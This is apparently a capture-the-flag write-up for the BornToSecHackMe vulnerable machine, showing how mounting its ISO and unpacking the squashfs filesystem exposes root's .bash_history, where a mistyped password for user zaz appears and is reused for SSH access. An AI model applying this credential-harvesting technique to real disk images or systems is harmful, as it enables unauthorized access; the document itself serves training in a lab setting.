Since we are given an ISO file to create the vulnerable machine, we could also exploit the ISO directly to make our life easier.
First, using mount we'll get access to its filesystem...
$> sudo mkdir /mnt/iso
$> sudo mount -o loop BornToSecHackMe-v1.1.iso /mnt/iso/
$> ls -l /mnt/iso
total 10
dr-xr-xr-x 2 root root 2048 juin 17 2017 casper
dr-xr-xr-x 2 root root 2048 juin 16 2017 install
dr-xr-xr-x 2 root root 2048 juin 17 2017 isolinux
-r--r--r-- 1 root root 844 juin 17 2017 md5sum.txt
dr-xr-xr-x 2 root root 2048 juin 16 2017 preseed
-r--r--r-- 1 root root 201 juin 17 2017 README.diskdefines
-r--r--r-- 1 root root 0 juin 17 2017 ubuntuWe create a mount point inside
/mntwhich is the default directory to do so. theloopoption will find an unused device to correspond to the ISO in order to mount it correctly.
All these files are used to rebuild the OS and everything on top along with configurations. This particular ISO, casper was used. We should find a squashfs file, it is a compress form of the whole file-system. Using unsquashfs we could retrieve all the files within the file-system...
$> sudo unsquashfs /mnt/iso/casper/filesystem.squashfs
Parallel unsquashfs: Using 1 processor
61188 inodes (56421 blocks) to writeIt outputs a squashfs-root directory with what you'd expect from a filesystem. Meaning we can retrieve command history from root by checking inside .bash_history file located in its home.
$> sudo cat squashfs-root/root/.bash_history
...
adduser zaz
646da671ca01bb5d84dbb5fb2238dc8e
...
addusercreates a new user for this machine. The password was incorrectly input twice, so we can grab it.
With this credentials pair, we can directly connect to the machine via ssh after fiding machine's IP like in Writeup 1, part 1. This exploit allow us to skip directly to zaz exploit like in Writeup 1, part 6.